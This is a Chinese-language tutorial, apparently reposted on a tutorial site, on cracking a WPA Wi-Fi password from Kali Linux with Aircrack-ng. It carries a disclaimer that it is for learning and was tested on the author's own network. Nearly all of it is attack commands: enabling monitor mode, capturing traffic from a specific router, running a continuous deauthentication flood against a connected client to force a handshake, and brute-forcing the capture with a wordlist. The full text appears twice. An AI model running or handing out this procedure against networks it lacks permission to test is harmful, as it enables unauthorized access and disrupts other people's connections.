admin管理员组文章数量:1130349
声明:只做密码爆破学习,不用于破坏,本文测试的是自己的wifi。
本文使用Aircrack-ng破解,当然也可以用fluxion
首先,我们要有一个能连接Linux虚拟机,并且能监听网络的无线网卡
插入无线网卡,连接到kali虚拟机
Ifconfig 查看网卡是否识别
出现vlan0就是已识别
可以先airmon-ng命令查看无线网卡列表
然后开启网卡监听 airmon-ng start wlan0
出现mac80211这些代表监听成功
再次ifconfig,确认监听成功
发现wlan0的名字变成了wlan0mon,变成了监听模式
扫描附近的wifi
airodump-ng wlan0mon
CH是信道,就像车道一样,如果1车道车满了,就可以去2车道,以此类推
选择wifi的mac地址,及抓包保存路径
airodump-ng --bssid 6C:B1:58:39:A1:16 -c 11 -w /home wlan0mon
–bssid 路由器的mac地址
-c 信道
-w 抓包保存地址
下面D2:99:EE:FD:F8:7E是正在连接改wifi的设备MAC
抓包
重新打开一个界面(因为前面的监听不能停),输入命令
aireplay-ng -0 0 -a 路由器的mac -c 连接设备的mac wlan0mon
aireplay-ng -0 0 -a 6C:B1:58:39:A1:16 -c D2:99:EE:FD:F8:7E
发现监听这里create了一个包
cp /home-02.cap /home/kali/Desktop
选择保存的包,开始爆破
aircrack-ng -w /home/kali/Desktop/wifi.txt /home-02.cap
发现密码
声明:只做密码爆破学习,不用于破坏,本文测试的是自己的wifi。
本文使用Aircrack-ng破解,当然也可以用fluxion
首先,我们要有一个能连接Linux虚拟机,并且能监听网络的无线网卡
插入无线网卡,连接到kali虚拟机
Ifconfig 查看网卡是否识别
出现vlan0就是已识别
可以先airmon-ng命令查看无线网卡列表
然后开启网卡监听 airmon-ng start wlan0
出现mac80211这些代表监听成功
再次ifconfig,确认监听成功
发现wlan0的名字变成了wlan0mon,变成了监听模式
扫描附近的wifi
airodump-ng wlan0mon
CH是信道,就像车道一样,如果1车道车满了,就可以去2车道,以此类推
选择wifi的mac地址,及抓包保存路径
airodump-ng --bssid 6C:B1:58:39:A1:16 -c 11 -w /home wlan0mon
–bssid 路由器的mac地址
-c 信道
-w 抓包保存地址
下面D2:99:EE:FD:F8:7E是正在连接改wifi的设备MAC
抓包
重新打开一个界面(因为前面的监听不能停),输入命令
aireplay-ng -0 0 -a 路由器的mac -c 连接设备的mac wlan0mon
aireplay-ng -0 0 -a 6C:B1:58:39:A1:16 -c D2:99:EE:FD:F8:7E
发现监听这里create了一个包
cp /home-02.cap /home/kali/Desktop
选择保存的包,开始爆破
aircrack-ng -w /home/kali/Desktop/wifi.txt /home-02.cap
发现密码
版权声明:本文标题:kali爆破wifi密码测试 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://it.en369.cn/jiaocheng/1763800720a2964732.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。


发表评论